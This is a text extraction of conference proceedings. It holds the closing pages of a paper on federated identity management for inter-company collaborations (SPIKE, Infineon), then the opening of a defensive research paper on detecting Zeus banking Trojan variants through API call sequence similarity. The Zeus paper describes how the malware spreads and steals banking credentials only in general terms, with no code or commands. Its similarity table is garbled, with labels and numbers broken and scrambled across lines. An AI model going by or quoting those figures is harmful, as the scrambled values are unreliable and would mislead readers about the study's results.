terms used for enterprise collaboration (alliances) are Virtual Organizations (Skyrme 2007),<br />

Networked Organizations (Lipnack and Stamps 1994) and Collaborative Innovation Networks [GL06].<br />

The so-called Virtual Team represents another well-known expression on the micro-level (Lipnack<br />

and Stamps 1997).<br />

A common sense of the mentioned concepts can be summarized by the following aspects (Lipnack<br />

and Stamps 1997):<br />

Independent people and groups act as independent nodes in a network,<br />

Are linked across conventional boundaries (e.g. departments and geographies)<br />

And work together for a common purpose.<br />

A collaboration has multiple leaders, lots of voluntary links and interacting levels,<br />

Is based on mutual responsibility, i.e. there is no hierarchical management structure but the<br />

involved individuals act as equal partners,<br />

And teams are readjusted or disbanded as needed.<br />

A successful collaboration requires the fulfillment of the following principles (Skyrme 2007):<br />

Each partner must contribute some distinctive added value for the corporation.<br />

Members must develop high degree of mutual trust and understanding. Thus, similar groups or<br />

even the same people will work together again and again.<br />

Projects or whole services should be the focus of the cooperation.<br />

In the run-up of a collaboration one has to define general rules of engagement in terms of inputs<br />

to the cooperation and rewards expected, though the momentum is lost if these are too formalized<br />

too soon.<br />

Members of the cooperation should recognize the need for coordination roles and either commit<br />

time to develop and nurture these roles or pay one of the members to undertake the coordination<br />

roles on behalf of them.<br />

244


Maria Semmelrock-Picej et al.<br />

A clear interface needs to be developed with non virtual customers - they like tidy relationships<br />

and clear contracts. Thus either one member of the virtual cooperation must act on behalf of the<br />

others (using them as subcontractors) or create a joint company to act as their legal entity and<br />

administration service.<br />

The highly dynamic business forces Infineon to set up strategic alliances (project partnerships)<br />

frequently, in order to be competitive in cost and time. The chip design process and the production<br />

environment (silicon foundries) serve as good examples for necessary alliances. While partnerships in<br />

the course of the chip design aim at reducing the time to market, alliances during the production focus<br />

on covering customer demands which increase the available production capacities. Especially the<br />

design process for very complex chips sometimes requires setting up an alliance with one or more<br />

competitors to reduce the overall development costs of the chip. For the automotive industry (one of<br />

our three business areas), highly-logic special-function chips are designed. The business strategy of<br />

Infineon also includes cooperation in terms of an alliance with a customer to develop “next<br />

generation” chips which represent a quantum leap in technology and/or function (Schelmer 2008).<br />

Today a complex process for the setup of collaborations exist (see figure 5)<br />

The process starts with an internal employee requesting an identity entry in the IDMS for the external<br />

persons belonging to other organisations of the business alliance. The following phases include the<br />

provisioning of resources and carrying out the revocation of access on the respective resources once<br />

the alliance ends. This process is applied for each (strategic) alliance wherein external staff is<br />

involved.<br />

However, this approach requires an internal employee at Infineon to trigger a lot of things prior to an<br />

external alliance partner being able to start performing his tasks. A lot of single resources have to be<br />

provisioned for the external partners (there is currently no role-model and a suitable tooling available)<br />

accompanied by a lot of approval workflows which slows down the whole setup process. Furthermore,<br />

knowledge about external employees, e.g. which resources they need to access at Infineon, is<br />

necessary in advance (reduction in flexibility). Moreover, today the whole identity information of<br />

external persons is also kept in the IDMS whereby the data volume is blowing up.<br />

To overcome these deficiencies, the approach of Federated Identity Management (also called identity<br />

federations) whose core idea is to allow individuals to use the same accounts and passwords they<br />

have in their company to get access to a network of another company was established.<br />

At first a user’s identity data is maintained at an identitiy provider in its IDMS. In the context of SPIKE<br />

the partner company of INF takes over the role of an identity provider, while INF acts as service<br />

provider during this collaboration. Subsequently, the user tries to access a service (an application, a<br />

data source, and so on) of the service provider. Thereby, the user is verified at the identity provider<br />

(the collaboration partner) by the service provider (INF). If the identity provider successfully<br />

authenticates the data – or spoken in SPIKE terminology fulfils the tasks which were negotiated in the<br />

collaboration contract -, the user will get access to the requested service.<br />

Business partners trust each other for the user authentication mechanisms they employ in their<br />

company and also guarantee that only authenticated users will have access to services (resources,<br />

applications) of the alliance partner. This is a precondition for companies to use applications in a<br />

common way without being forced to use the same directory services, authentication mechanisms<br />

and duplicate digital identities to the other system.<br />

Federated Identity Management also reduces the administration overhead in an alliance because it is<br />

not required that the collaboration partner has to know the involved employees who need access to<br />

the resources of the alliance partner in advance. The identity provider has also a large flexibility to<br />

manage (exchange, increase, decrease) the staff during the existence of the alliance according to the<br />

needs of the service provider. The service provider only has to care for the access to applications<br />

needed by both companies (e.g. design application in the chip design area or administration<br />

applications in the IT area, and so on).<br />

In the next chapters the requirements of the component SPIKE/IF (identity federation module) of a life<br />

cycle model for collaborations will be described in order to overcome the mentioned deficiencies.<br />

245


Maria Semmelrock-Picej et al.<br />

Figure 5: Creation process for external collaboration partners<br />

3.2 Description of the requirements for connecting to external IDM<br />

Federated Identity Management enables the usage of digital identities in an inter-organisational way.<br />

This means that users can apply their local digital identity at their home company in order to access<br />

shared resources within collaborations. A fundamental precondition is the administration of digital<br />

identities in an IDMS which needs to be connected with SPIKE. For organisations willing to participate<br />

246


Maria Semmelrock-Picej et al.<br />

in collaborations operated by SPIKE we identified some technical requirements which must be fulfilled<br />

and which are presented in the next chapter:<br />

3.2.1 Overview<br />

SPIKE Identity Federation Module (short SPIKE/IF) ist the building block in the architecture (see next<br />

figure) for the setting up of collaborations between companies, defining roles and resource bundles<br />

and the access management of federated identities during collaboration.<br />

In Figure 6 the collaboration model is shown. Before a company can take part in any collaboration,<br />

the phase “collaboration setup” has to be passed. This phase describes the tasks of a company’s<br />

administrator, to provide the required resources. The most basic resource to be provided is the<br />

network configuration.<br />

Figure 6: Identity federation life cycle model<br />

3.2.2 Setting up a collaboration<br />

In our project there are different types of collaboration possible, depending on who is carrying out the<br />

service provider function in the collaboration.<br />

It is that users of a company can only be assigned to services of a partner company by the<br />

responsibles of their own company (security, reducing complexity and keep flexibility). Only the hub<br />

company can extend a collaboration with additional partner companies (security aspect). In the<br />

following the setting up of a collaboration is visualized.<br />

Unfortunately, nowadays collaborative applications commonly use centralized infrastructures. The use<br />

of such systems has generated a huge interest in decentralized systems so that in our case different<br />

types of collaboration are possible depending on who is carring out the service provider funtion in the<br />

collaboration. In the following the centralized collaboration is presented (figure 8):<br />

247


Figure 7: Steps to set up a collaboration<br />

Figure 8: Centralized collaboration<br />

Maria Semmelrock-Picej et al.<br />

248


Maria Semmelrock-Picej et al.<br />

In the case of a centralized collaboration only the hub company offers services which are accessed by<br />

partners. The partner companies only act as identity provider for their federated users. This type of<br />

collaboration mostly apperas when only one large company is involved which offers a large service<br />

and application landscape with complex business processes supported by workflow management<br />

systems and when partners are mostly smaller companies without an own service infrastructure but<br />

specialized and/or cost-efficient employees which take over whole outsourced services of the Hub<br />

company.<br />

In the case of a decentralized collaboration (see figure 9) all partners offer services in the<br />

collaboration and act as Service Providers which are accessed mutually. All Partner act as identity<br />

Provider for their federated users. This type of collaboration often appears when one or more large<br />

companies are involved which offer a large service and application landscape with complex business<br />

processes supported by workflow management systems and those workflows include the involvement<br />

of highly specialized partner companies or when partners are companies with few but highly<br />

specialized services which can be offered cost-efficiently.<br />

Figure 9: Decentralized collaboration<br />

3.2.3 Role and resource management<br />

Modeling roles is a research topic with a long history. There are a lot of approaches (Ferraiolo, Kuhn<br />

and Chandramouli 2003) which are more or less successful. They can be classified according to three<br />

different strategies:<br />

Top-down is based on the analysis of business processes and organizational structures;<br />

Bottom-up tries to analyze information of existing permissions throughout different systems and<br />

aggregate similar patterns (clusters) to roles;<br />

Hybrid approaches combine both strategies<br />

The necessary steps during resource and role management are modelled in figure 10.<br />

249


Maria Semmelrock-Picej et al.<br />

Figure 10: Steps during role and resource management<br />

4. Conclusions<br />

In this paper the architecture of SPIKE IDMS is presented and it is shown how it can be integrated<br />

with an IdP. The SPIKE IDMS has been thought to work mainly for SMEs which do not own a<br />

propietary IDMS and therefore need this extra tool when a collaboration within SPIKE is started. In<br />

doing so we improve the opportunities of SMEs in a globalising world.<br />

References<br />

Artz, D. and Gil, Y. (2007) „A survey of trust in computer science and the semantic web“, Journal of Web<br />

Semantics, Vol 5, No. 2, pp 58-71.<br />

Billhardt, H., Hermoso, R., Ossowski, S. and Centeno, R. (2007) „Trust-based service provider selection in open<br />

environments“, ACM Symposium on Applied Computing (SAC), pp 1375-1380.<br />

Davenport, T.H. and Prusak, L. (1998) Working Knowledge: How Organizations Manage What they know,<br />

Harvard Business School Press, Boston MA.<br />

Ferraiolo, D.F., Kuhn, R.D. and Chandramouli, R. (2003) Role-Based Access Control, Artech House.<br />

Economist (2008) “The role of trust in business collaboration. An Economist Intelligence Unit”, Cisco Systems,<br />

Vol 10, No. 70.<br />

250


Maria Semmelrock-Picej et al.<br />

Fuchs, L. and Pernul, G. (2007) “Supporting Compliant and Secure User Handling – A Structured Approach for<br />

In-House Identity Management”, The Second International <strong>Conference</strong> on Availability, Reliability and<br />

Security (ARES 2007), IEEE Society, Los Alamitos, pp 374–384.<br />

Jackson, G. (2010) “Identity and Access Management”, [online], The University of Chicago, Overview paper,<br />

www.internet2.edu/pubs/200703-ISMW.pdf.<br />

Josang, A., Ismail, R. and Boyd, D. (2007) “A survey of trust and reputation systems for online service provision”,<br />

Decision Support Systems, Vol 43, No. 2, pp 618-644.<br />

Klein, R., Rai, A. and Straub, D.W. (2007) “Competitive and cooperative positioning in supply chain logistics<br />

relationship”, Decision Sciences, Vol 38, No. 4, pp 611-646.<br />

Lipnack, J. and Stamps, J. (1994) The age of the Network – Organizing principles for the 21 st Century, John<br />

Wiley & Sons.<br />

Lipnack, J. and Stamps, J. (1997) Virtual Teams – Reaching across space, time and organizations with<br />

technology, John Wiley & Sons.<br />

Matsuo, Y. and Yamamoto, H. (2009) “Community gravity: Measuring bidirectional effects by trust and rating on<br />

online social network”, International World Wide Web <strong>Conference</strong> (WWW), pp 751-760.<br />

Mohrman, S. A., Finegold, D. and Mohrman, A. M. (2003) “An empirical model of the organization knowledge<br />

system in new product development firms”, Journal of Engineering Technology Management, Vol 20, No. 1,<br />

pp 7-38.<br />

Mori, J., Sugiyaman, T. and Matsuo, Y. (2005) “Real-world oriented information sharing using social networks”,<br />

Group, pp 81-85.<br />

Mui, L., Mohtashemi, M. and Halberstadt, A. (2002) “A computational model of trust and reputation for e-<br />

Business”, Hawaii International <strong>Conference</strong>s on Systems Sciences (HICSS), p.188.<br />

Obiltschnig, A. (2007) Role-based Provisioning - Ein praktischer Ansatz im Identity Manage-ment, Institute for<br />

Applied Computer Science, Faculty for Technical Sciences, University of Klagenfurt, Klagenfurt.<br />

Schmelmer M. (2008) “Infineon setzt bei IT auf Einsparungen”, [online],<br />

www.cio.de/strategien/methoden/850789/index.html.<br />

Semmelrock-Picej, M.Th. and Possegger, A. (2010) “Ausgewählte Sicherheitsrelevante Aspekte der<br />

eCollaboration”, D-A-CH Security 2010, pp 314-325.<br />

Skyrme, D. (2007) „Insights“, [online], www.skyrme.com/insights/.<br />

Zack, M.M. (1999) “Managing codified knowledge”, Sloan Management Review, Vol 40, No. 4, pp 45-58.<br />

Ziener, K. (2010) Grenzüberschreitende Wirtschaftskooperationen und Interreg III A Projekte, Klagenfurt 2010.<br />

251


Anatomy of Banking Trojans – Zeus Crimeware (how<br />

Similar are its Variants)<br />

Madhu Shankarapani and Srinivas Mukkamala<br />

(ICASA)/(CAaNES)/New Mexico Institute of Mining and Technology, USA<br />

madhuk@cs.nmt.edu<br />

srinivas@cs.nmt.edu<br />

Abstract: To add complexity to existing cyber threats; targeted Crimeware that steals personal information for<br />

financial gains is for sale as low as $700 dollars. Baking Trojans have been notoriously difficult to kill and to date<br />

most antivirus and security technologies fail to detect or prevent them from causing havoc. Zeus which is<br />

considered as one of the most nefarious financial and banking Trojans targets business and financial institutions<br />

to perform unauthorized automated clearinghouse (ACH) and wire transfer transactions for check and payment<br />

processing. Zeus is causing billions of dollars in losses and is facilitating identity theft of innocent users for<br />

financial gains. Zeus Crimeware does one thing very well that every security researcher envy’s – obfuscation.<br />

Zeus kit conceals the exploit code every time a binary is created. Zeus Crimeware has an inbuilt binary generator<br />

that generates a new binary file on every use that is radically different from others; which evades detection from<br />

antivirus or security technologies that rely on signature based detection. The effectiveness of an up to date<br />

antivirus against Zeus is thus not 100%, not 90%, not even 50% – it’s just 23% which is alarming. No<br />

matter how smart and how different Zeus binaries are, most of them share a few common behavioral patterns<br />

such as an ability to take screenshots of a victim's machine, or control it remotely, hijacking E-banking sessions<br />

and logging them to the level of impersonation or add additional pages to a website and monitor them, or steal<br />

passwords that have been stored by popular programs and use them. In this paper we present detection<br />

algorithms that can help the antivirus community to ensure a variant of a known malware can still be detected<br />

without the need of creating a signature; a similarity analysis (based on specific quantitative measures) is<br />

performed to produce a matrix of similarity scores that can be utilized to determine the likelihood that a piece of<br />

code or binary under inspection contains a particular malware. The hypothesis is that all versions of the same<br />

malware family or similar malware family share a common core signature that is a combination of several<br />

features of the code (binary). Results from our recent experiments on 40 different variants of Zeus show very<br />

high similarity scores (over 85%). Interestingly Zeus variants have high similarity scores with other banking<br />

Trojans (Torpig, Bugat, and Clampi) and a well know data stealing Trojan Qakbot. We present experimental<br />

results that indicate that our proposed techniques can provide a better detection performance against banking<br />

Trojans like Zeus Crimeware.<br />

Keywords: Zeus Crimeware, banking Trojans, Torpig, Bugat, Clampi, malware similarity analysis, anatomy of<br />

Zeus, malware analytics<br />

1. Introduction<br />

One of the major concerns in network security is controlling the spread of malware over the Internet.<br />

In particular, polymorphic and metamorphic versions of the malware are the most troublesome among<br />

malware families, because of their capabilities not only to infect the systems but also have potential to<br />

steal confidential user data and be persistent. These kinds of malware are written with the intent of<br />

taking control of large number of hosts on the internet. Once the hosts are infected by Trojans, they<br />

may join a botnet for stealing personal data such as user credentials (Holz, Engelberth and Freiling,<br />

2008), (Kanich et al, 2008). Over a period of time writing malware has changed from developed for<br />

fun, to the present, where it is written for financial gains.<br />

Trojans in the past were used for sending spam emails, installing third party malware, keystroke<br />

logging, crashing the host machine, uploading or downloading of files on the infected machines. In the<br />

present generation Trojans are far more complex, when Trojan notices the user visiting the websites<br />

of targeted bank it springs into action. When the user is carrying out some transactions, the Trojan<br />

looks at the available balance and calculates how much money to steal. These Trojans are given<br />

upper and lower bound limits that are below the amount that triggers antifraud systems. ZEUS,<br />

Torpig, zlob, vundo, smitfraud, etc are a few examples for deadly Trojans that caused major financial<br />

loss.<br />

Torpig is a malware program that was developed to steal sensitive information from its infected hosts.<br />

In early 2005 over 180 thousand machines were infected and about 70 GB of data were stolen and<br />

uploaded to the bot-masters (Stone-Gross et al, 2009), (Nichols, 2009). Torpig depends on domain<br />

flux for its main C&C servers, and also the servers to perform drive-by-download to spread on a<br />

252


Madhu Shankarapani and Srinivas Mukkamala<br />

network. Using JavaScript, it generates pseudo-random domain name on-the-fly and redirects victims<br />

to a malicious webpage.<br />

Vundo, also known as VirtuMundo, VirtuMonde, and MS Juan, spreads via email, peer-to-peer file<br />

sharing, and by other malware (Bell and Chien, 2010). It exploits browser vulnerability and displays<br />

pop-up advertisements. This Trojan has capabilities to inject advertisements into search results.<br />

Fraudulent or misleading applications, intrusive pop-ups, fake scan results are characteristics of this<br />

Trojan. Vundo lowers security settings, prevents access to certain websites, and also disables<br />

antivirus programs, to make it further difficult to remove them. Its new variants are far more<br />

sophisticated with their payloads and its functionality. They have the capability to exploit vulnerability<br />

to download misleading software, and extensions that encrypt files in order to force user for money.<br />

Zeus is a Trojan horse that steals banking information from infected machines, which spreads using<br />

drive-by-downloads and phishing emails. Since from the date it was first identified, Zeus has been<br />

very active in the wild with constant increase in threat. The most threatening is a large group working<br />

on Zeus to create enormous Zeus/Zbot variants builder, which can evade the present anti-virus<br />

software.<br />

The problem is so critical, that a significant research effort has been invested to gain a better<br />

understanding of these malware characteristics. One of the approaches to study the characteristics is<br />

to perform passive analysis of secondary effects that are caused by the activities of compromised<br />

hosts. Many researchers have performed passive analysis like collecting spam emails that are likely<br />

to be sent by bots (Zhuang et al, 2008), DNS queries (Rajab et al, 2007), (Rajab et al, 2006) or DNS<br />

blacklist queries (Ramachandran, Feamster and Dagon, 2006) performed by the bot-infected<br />

machines, analysis of network traffic for cues that are characteristics for certain botnets (Karasaridis,<br />

Rexroad and Hoeflin, 2007).<br />

While these analysis provides interesting insights into particular characteristics of Trojans and bots, its<br />

approach is limited to those botnets that actually exhibit the activity targeted by the analysis. Active<br />

approaches to analyze botnets are through permeation. In this approach researchers join the bot to<br />

perform analysis. Usually honeypots or spam traps are used to collect a copy of a malware sample.<br />

Later, the obtained samples are executed in controlled environment and observe its behavior.<br />

Observations include traffic that is exchanged between bots and its command and control server(s),<br />

IP addresses of other clients that are concurrently logged into the IRC channel (Rajab et al, 2006),<br />

(Cooke, Jahanian and McPherson, 2006), (Freiling, Holz and Wicherski, 2005). Unfortunately these<br />

techniques do not work on stripped-down IRC or HTTP servers as their C&C channels.<br />

Present anti-virus techniques are based on either signature-based detection which is not effective<br />

against polymorphic and unknown malware, or heuristic-based algorithms which are inefficient and<br />

inaccurate. Detection based on string signatures uses a database of regular expressions and a string<br />

matching engine to scan files and detect infected ones. Each regular expression of the database is<br />

designed to identify a known malicious program. Though traditional signature-based malware<br />

detection methods does exists from ages, there are lots to improve the signature-based detection and<br />

to detect new malware a few data mining and machine learning techniques are proposed (Westfeld,<br />

2001: 289-302), (Sallee, 2005: 167-189), (Solanki, Sarkar and Manjunath, 2007: 16-31) examined the<br />

performance of various classifiers such as Naïve Bayes, support vector machine (SVM) and plotting<br />

ROC curves using decision tree methods. (Lyu, and Farid, 2002: 340-354) applied Objective-Oriented<br />

Association (OOA) mining based classification (Fridrich, 2004: 67-81), (Shi, Chen and Chen, 2006) on<br />

Windows API execution sequences called by PE files. A Few of these methods entirely rely on the<br />

occurrence of API sequence of execution. There are methods where websites are crawled to inspect<br />

if those websites host any kind of malicious executables (Pevny, Fridrich, 2007). This study is<br />

generally for web server security, advertising and third-party widgets. Their basic idea of approach<br />

shows how malware executables are often distributed across a large number of URLs and domains.<br />

Analyze and detect these obfuscated malicious executable is by itself a vast field.<br />

Our work is based on collection of Zeus/Zbot variants collected at Offensive Computing (Offensive<br />

Computing, 2010). As of today, Offensive Computing has one of the largest malware databases which<br />

include various kinds of executables like spyware, adware, virus, worms, Trojans, etc. Among<br />

thousands of malware in computing world, the unique executables is likely to be much lower as many<br />

253


Madhu Shankarapani and Srinivas Mukkamala<br />

binaries differ only in binary packing (Chen and Shi, 2008) and not in their functionality. In this paper<br />

we show how Zeus/Zbot variants can be detected effectively.<br />

In our recent engagements we used this methodology to detect variants of Conficker, Zeus<br />

Crimeware, and Data stealers that bypassed several popular antivirus tools, host based security tools,<br />

and perimeter security devices.<br />

In this paper, we present API call sequence approach to detect Zeus samples. Our approach rests on<br />

the analysis of Windows API call sequence, and applying distance measures to detect how similar are<br />

these variants.<br />

In summary, the main contribution of this paper is to detect Zeus effectively. In this paper, we talk<br />

about a few lethal malware and how important is it to find a good defensive mechanism, in<br />

introduction. Next is about the evolution of Zeus, followed by its reverse engineered result. And the<br />

following section we explain our method of analyzing Zeus. Finally, we conclude with our conclusion<br />

based on our experiments and references.<br />

2. Evolution of Zeus/Zbot<br />

Zeus is a Trojan horse that steals banking information from infected machines, which spreads using<br />

drive-by-downloads and phishing emails. Its persistence is because of large number of attackers<br />

using Zeus builder. These attackers pay thousands of dollars for the latest Zeus builders which are<br />

up-to-date undetectable bot builds (SHEVCHENKO, 2009). Everyday a new Zeus/Zbot samples are<br />

distributed by modifying the bot that are being produced in the wild, or by using packers and<br />

encrypted on top with all sorts of packers, and few using custom built packers. Before its release,<br />

these samples are uploaded to multi-anti-virus scanners to make sure they are not detected by any<br />

anti-virus vendor.<br />

The worse thing of Zeus/Zbot is in latest generation of bot which uses rootkit techniques to hide its<br />

presence on infected machine, and injects additional fields into online Internet banking websites.<br />

These details are collected and sent to remote systems, which is later stored in remote database.<br />

From this database the attacker uses user credentials to transfers desired amount to his account.<br />

In July 2007, Zeus was first found infecting United States Department of Transportation and stole data<br />

from over 1000 PCs (Wikipedia, 2010), (Ragan, 2009). As of October 2009, 1.5 million phishing<br />

messages were sent through Facebook. In November 2009, A malicious spam emails were spreading<br />

Zeus purporting to be from Verizon Wireless (Moscaritolo, 2009). On October 1, 2010 a major cyber<br />

crime network had hacked into US computers using Zeus and stole around $70 million (Wikipedia,<br />

2010). Since its discovery to this day gangs have netted more than $200 million (McMillan and Kirk,<br />

2010).<br />

3. Reverse engineering Zeus/Zbot<br />

Zeus has been in the wild since 2006, though its method of propagation is through spam campaigns<br />

and drive-by downloads, due to its versatile nature even other vectors may also be utilized. The user<br />

may receive masquerading email message as if it is from well known organizations such as FDIC,<br />

IRS, Facebook or Microsoft. The message body warns the user about a financial problem and<br />

suggests visiting the link provided in the message body. Once the user visits the link, Trojan gets<br />

downloaded and compromises the host machine.<br />

Based on behavior of an executable (Qureshi) Zeus can be classified as Trojans. Zeus propagates<br />

using drive-by-downloads and phishing emails. It uses compromised FTP servers and peer-to-peer<br />

networks to spread, and unlike worm the end-user have to initiate the download. Once Zeus is<br />

downloaded on to a computer, it gets installed by itself, and tries to connect to the bots command<br />

controls for further instructions. From the command control it downloads configuration files and infects<br />

the browser. Later the malware monitors browser activities and steals appropriate data based on the<br />

encrypted information in the configuration file. Since it hooks up with services like svchosts to act as<br />

man in the browser, this shows characteristics of a virus.<br />

Figure (1) shows that the Trojan is packed using UPX, one of the most widely used packers and<br />

Figure (2) is its opcode instructions with initial EntryPoint. Figure (3) shows that the Trojan is packed<br />

and encrypted with the custom made Zeus builder and Figure (4) is its opcode instructions.<br />

254


Figure 1: UPX packed Trojan<br />

Figure 2: Opcode instructions with entry points<br />

Madhu Shankarapani and Srinivas Mukkamala<br />

Figure 3: Trojan packed and encrypted with the custom made Zeus builder<br />

255


Madhu Shankarapani and Srinivas Mukkamala<br />

Figure 4: Opcode instructions with entry points for the Trojan with custom made Zeus builder<br />

According to our observations though these two Trojans were created using different packers, their<br />

characteristics of using Windows API are almost similar. We observed the API call sequence of both<br />

the Trojans. When we applied distance measures after its API sequence alignment between them, we<br />

found they are about 92.32% similar to each other. This shows that irrespective of the obfuscation<br />

method used to create Zeus variants; our methodology can detect these Trojans.<br />

4. Analysis methodology<br />

First, the Zeus sample is decompressed and passed through a PE file parser, producing the<br />

intermediate representation which consists of a Windows API calling sequence. This sequence is<br />

compared to a known malware sequence or signature (from the signature database) and is passed<br />

through the similarity measure module to generate the similarity report. The detection decision is<br />

made based on this similarity report. The PE binary parser transforms the PE binary file into an API<br />

calling sequence. It uses two components, W32Dasm version 8.9 and a text parser for disassembled<br />

code. W32Dasm by URSoftware Co. is a commercial disassembler, which disassembled the PE code<br />

and outputs assembly instructions, imported modules, imported API’s, and recourse information. The<br />

text parser parses the output from W32Dasm to a static API calling sequence, which becomes our<br />

signature.<br />

Table 1: Similarity analysis of Zeus/Zbot compared among different variants<br />

Tro<br />

jan.<br />

Troj<br />

Sp<br />

Troj an. Troj Troj<br />

Troj<br />

y.Z<br />

Troj an. Spy an.S an.S<br />

Troj<br />

an.<br />

eus Troj Troja an.B Zbo .Ze py.Z py.Z Troja Troja an.Z Spy.<br />

.1. an.Z n.Spy roke t- us. eus. eus. n.Zbo n.Spy bot- DHL Zeu<br />

Ge bot- .Zeus r- 134 1.G 1.Ge 1.Ge t- .Zeus 115 _DO s.1.<br />

n. 85. .2.Ge 12. 2.m en. n.m n.m 290. .1.Ge 1.m C.m Gen<br />

mal mal n.mal mal al mal al al mal n.mal al al .mal<br />

Trojan.Sp 10<br />

y.Zeus.1. 0.0 51.9<br />

92.3 70. 51. 71.2 60.9<br />

79.8 71.2 47.7<br />

Gen.mal 0 0 67.00 2 06 72 7 3 63.45 61.43 8 7 1<br />

Trojan.Zb 46. 100.<br />

51.2 58. 53. 70.3 52.4<br />

63.5 69.5 45.3<br />

ot-85.mal<br />

Trojan.Sp<br />

83 00 58.19 7 00 44 9 6 56.69 42.69 3 0 3<br />

y.Zeus.2. 41. 49.7 100.0 66.0 70. 66. 30.9 51.9<br />

58.4 61.0 53.9<br />

Gen.mal<br />

Trojan.Bro<br />

31 2 0 3 78 95 9 1 88.23 60.26 9 7 0<br />

ker- 49. 34.7<br />

100. 43. 52. 38.2 44.1<br />

64.6 44.0 38.8<br />

12.mal 59 3 47.55 00 98 98 7 7 47.82 45.79 6 3 1<br />

256


Trojan.Zb<br />

ot-<br />

1342.mal<br />

Trojan.Sp<br />

y.Zeus.1.<br />

Gen.mal<br />

Trojan.Sp<br />

y.Zeus.1.<br />

Gen.mal<br />

Trojan.Sp<br />

y.Zeus.1.<br />

Gen.mal<br />

Trojan.Zb<br />

ot-<br />

290.mal<br />

Trojan.Sp<br />

y.Zeus.1.<br />

Gen.mal<br />

Trojan.Zb<br />

ot-<br />

1151.mal<br />

DHL_DO<br />

C.mal<br />

Trojan.Sp<br />

y.Zeus.1.<br />

Gen.mal<br />

MemScan<br />

Trojan.Sp<br />

y.Zeus.C.<br />

mal<br />

Trojan.Sp<br />

y.Zeus.1.<br />

Gen.mal<br />

Trojan.Zb<br />

ot-<br />

1652.mal<br />

GenTroja<br />

n.Heur.Zb<br />

ot<br />

Zeus.mal<br />

Trojan.Sp<br />

y.Zeus.1.<br />

Gen.mal<br />

ZeuS_bin<br />

ary.mal<br />

ZeuS_bin<br />

ary.mal<br />

Trojan.Sp<br />

y.Zeus.1.<br />

Gen.mal<br />

Trojan.Zb<br />

ot-<br />

2819.mal<br />

Trojan.Sp<br />

y.Zeus.1.<br />

Gen.mal<br />

Tro<br />

jan.<br />

Sp<br />

y.Z<br />

eus<br />

.1.<br />

Ge<br />

n.<br />

mal<br />

58.<br />

89<br />

65.<br />

58<br />

54.<br />

23<br />

57.<br />

96<br />

29.<br />

14<br />

64.<br />

30<br />

65.<br />

65<br />

40.<br />

35<br />

52.<br />

77<br />

78.<br />

75<br />

75.<br />

87<br />

69.<br />

79<br />

71.<br />

28<br />

64.<br />

18<br />

51.<br />

25<br />

76.<br />

05<br />

70.<br />

61<br />

44.<br />

52<br />

52.<br />

94<br />

52.<br />

74<br />

Troj<br />

an.Z<br />

bot-<br />

85.<br />

mal<br />

Madhu Shankarapani and Srinivas Mukkamala<br />

Troja<br />

n.Spy<br />

.Zeus<br />

.2.Ge<br />

n.mal<br />

63.7<br />

9 72.30<br />

68.4<br />

6 68.26<br />

56.9<br />

4 65.71<br />

49.4<br />

8 88.34<br />

44.2<br />

3 47.07<br />

69.3<br />

7 76.24<br />

59.4<br />

3 71.08<br />

40.5<br />

1 51.52<br />

52.9<br />

6 58.50<br />

78.2<br />

5 61.34<br />

75.2<br />

3 86.08<br />

69.3<br />

9 71.49<br />

76.3<br />

2 77.17<br />

53.6<br />

7 62.34<br />

59.0<br />

7 68.87<br />

87.6<br />

1 72.13<br />

77.7<br />

5 76.10<br />

43.0<br />

8 61.80<br />

57.5<br />

7 58.88<br />

68.8<br />

1 49.63<br />

Troj<br />

an.B<br />

roke<br />

r-<br />

12.<br />

mal<br />

83.4<br />

4<br />

84.6<br />

2<br />

76.9<br />

2<br />

83.9<br />

8<br />

41.5<br />

5<br />

87.5<br />

5<br />

83.6<br />

5<br />

62.8<br />

6<br />

66.4<br />

3<br />

76.6<br />

3<br />

77.0<br />

7<br />

71.6<br />

0<br />

64.0<br />

2<br />

75.5<br />

4<br />

79.9<br />

1<br />

70.2<br />

4<br />

68.3<br />

8<br />

64.4<br />

1<br />

68.6<br />

3<br />

51.0<br />

9<br />

Troj<br />

an.<br />

Zbo<br />

t-<br />

134<br />

2.m<br />

al<br />

100<br />

.00<br />

58.<br />

25<br />

74.<br />

23<br />

76.<br />

37<br />

34.<br />

21<br />

70.<br />

67<br />

75.<br />

80<br />

43.<br />

59<br />

79.<br />

69<br />

75.<br />

13<br />

74.<br />

35<br />

78.<br />

77<br />

76.<br />

97<br />

81.<br />

87<br />

69.<br />

26<br />

73.<br />

69<br />

69.<br />

21<br />

39.<br />

01<br />

64.<br />

06<br />

64.<br />

13<br />

Troj<br />

an.<br />

Spy<br />

.Ze<br />

us.<br />

1.G<br />

en.<br />

mal<br />

77.<br />

09<br />

100<br />

.00<br />

59.<br />

96<br />

59.<br />

37<br />

38.<br />

33<br />

70.<br />

03<br />

75.<br />

86<br />

52.<br />

05<br />

60.<br />

01<br />

79.<br />

93<br />

66.<br />

52<br />

73.<br />

46<br />

67.<br />

71<br />

65.<br />

30<br />

58.<br />

36<br />

79.<br />

45<br />

73.<br />

13<br />

46.<br />

47<br />

63.<br />

33<br />

64.<br />

95<br />

257<br />

Troj<br />

an.S<br />

py.Z<br />

eus.<br />

1.Ge<br />

n.m<br />

al<br />

55.0<br />

1<br />

70.9<br />

0<br />

100.<br />

00<br />

67.5<br />

2<br />

30.2<br />

3<br />

64.6<br />

9<br />

61.8<br />

1<br />

40.0<br />

0<br />

64.7<br />

5<br />

71.8<br />

8<br />

71.0<br />

9<br />

74.1<br />

7<br />

77.2<br />

0<br />

72.5<br />

4<br />

53.3<br />

1<br />

67.9<br />

8<br />

70.0<br />

6<br />

41.9<br />

1<br />

67.5<br />

3<br />

71.1<br />

3<br />

Troj<br />

an.S<br />

py.Z<br />

eus.<br />

1.Ge<br />

n.m<br />

al<br />

Troja<br />

n.Zbo<br />

t-<br />

290.<br />

mal<br />

Troja<br />

n.Spy<br />

.Zeus<br />

.1.Ge<br />

n.mal<br />

76.7<br />

1 80.02 58.13<br />

81.7<br />

1 54.58 42.36<br />

66.6<br />

9 96.12 54.59<br />

100.<br />

00 51.16 54.44<br />

53.7<br />

3<br />

74.6<br />

3 61.09<br />

100.0<br />

0 21.68<br />

100.0<br />

0<br />

63.1<br />

1<br />

62.5<br />

61.11 57.36<br />

6 66.98 41.70<br />

78.7<br />

2 76.44 60.37<br />

84.0<br />

5 85.10 80.75<br />

72.3<br />

5 53.98 63.05<br />

85.2<br />

8 92.50 70.64<br />

70.9<br />

9<br />

69.1<br />

79.78 75.07<br />

2 75.56 69.18<br />

78.0<br />

0<br />

67.8<br />

64.52 65.70<br />

4<br />

75.0<br />

67.21 70.49<br />

0 51.33 61.99<br />

47.0<br />

